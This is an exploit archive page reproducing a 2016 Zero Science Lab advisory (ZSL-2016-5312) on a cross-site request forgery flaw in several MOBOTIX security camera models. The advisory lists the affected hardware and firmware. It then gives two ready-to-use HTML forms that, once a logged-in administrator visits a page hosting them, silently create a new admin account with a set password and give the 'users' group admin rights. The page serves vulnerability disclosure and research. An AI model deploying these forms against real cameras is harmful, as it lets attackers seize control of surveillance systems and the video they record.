MOBOTIX Video Security Cameras Cross Site Request Forgery

MOBOTIX Video Security Cameras Cross Site Request Forgery: Posted Mar 30, 2016; Authored by LiquidWorm | Site zeroscience.mk; The application interface MOBOTIX VMS allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.; tags | exploit, web; SHA-256 | 77cbabac557201e3332a96765390bee02b5dc304912c8cf70fa98cb20b8c8fa3; Download | Favorite | View

MOBOTIX Video Security Cameras Cross Site Request Forgery

<!--


MOBOTIX Video Security Cameras CSRF Add Admin Exploit


Vendor: MOBOTIX AG
Product web page: https://www.mobotix.com
Affected version: [Model]: D22M-Secure, [HW]: T2r1.1.AA, 520 MHz, 128 MByte RAM, [SW]: MX-V3.5.2.23.r3
                  [Model]: Q24M-Secure, [HW]: T2r3.1, 806 MHz, [SW]: MX-V4.1.10.28
                  [Model]: D14D-Secure, [HW]: T2r4.2b, 806 MHz, 256 MByte RAM, [SW]: MX-V4.1.4.70
                  [Model]: M15D-Secure, [HW]: T3r4.4, 806 MHz, [SW]: MX-V4.3.4.50

Summary: MOBOTIX is a German System Manufacturer of Professional Video
Management (VMS) and Smart IP Cameras. These cameras support all standard
features of MOBOTIX IP cameras like automatic object detection, messaging
via network and onboard or network recording. The dual lens thermal system
supports additionally a second optical video sensor with 6-megapixel resolution.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Linux 2.6.37.6+
           thttpd/2.19-MX


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5312
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5312.php


25.02.2016

-->



Add admin user Testingus:
-------------------------

<html>
  <body>
    <form action="http://10.0.0.17/admin/access" method="POST">
      <input type="hidden" name="user_name_0" value="admin" />
      <input type="hidden" name="user_group_0" value="admins" />
      <input type="hidden" name="user_passwd_a_0" value="***" />
      <input type="hidden" name="user_passwd_b_0" value="***" />
      <input type="hidden" name="user_name_2" value="Testingus" />
      <input type="hidden" name="user_group_1" value="admins" />
      <input type="hidden" name="user_passwd_a_2" value="l33tp4ss" />
      <input type="hidden" name="user_passwd_b_2" value="l33tp4ss" />
      <input type="hidden" name="sv_passwd_a" value="" />
      <input type="hidden" name="sv_passwd_b" value="" />
      <input type="hidden" name="super_pin_1" value="" />
      <input type="hidden" name="super_pin_2" value="" />
      <input type="hidden" name="save_config" value="Set" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>


Add group 'users' to admin area:
--------------------------------

<html>
  <body>
    <form action="http://10.0.0.17/admin/acl" method="POST">
      <input type="hidden" name="group_allow_guest_global" value="on" />
      <input type="hidden" name="group_allow_live_global" value="on" />
      <input type="hidden" name="group_allow_player_global" value="on" />
      <input type="hidden" name="group_allow_multiview_global" value="on" />
      <input type="hidden" name="group_allow_pda_global" value="on" />
      <input type="hidden" name="group_allow_mxcc_global" value="on" />
      <input type="hidden" name="group_allow_info_global" value="on" />
      <input type="hidden" name="group_allow_imagelink_global" value="on" />
      <input type="hidden" name="group_allow_api_global" value="on" />
      <input type="hidden" name="group_allow_image_setup_0" value="on" />
      <input type="hidden" name="group_allow_event_setup_0" value="on" />
      <input type="hidden" name="group_name_1" value="guests" />
      <input type="hidden" name="group_name_2" value="users" />
      <input type="hidden" name="group_allow_admin_2" value="on" />
      <input type="hidden" name="group_allow_image_setup_2" value="on" />
      <input type="hidden" name="group_allow_event_setup_2" value="on" />
      <input type="hidden" name="new_group" value="" />
      <input type="hidden" name="save_config" value="Set" />
      <input type="hidden" name="more_or_less" value="less" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

MOBOTIX Video Security Cameras Cross Site Request Forgery

MOBOTIX Video Security Cameras Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MOBOTIX Video Security Cameras Cross Site Request Forgery

Share This

MOBOTIX Video Security Cameras Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems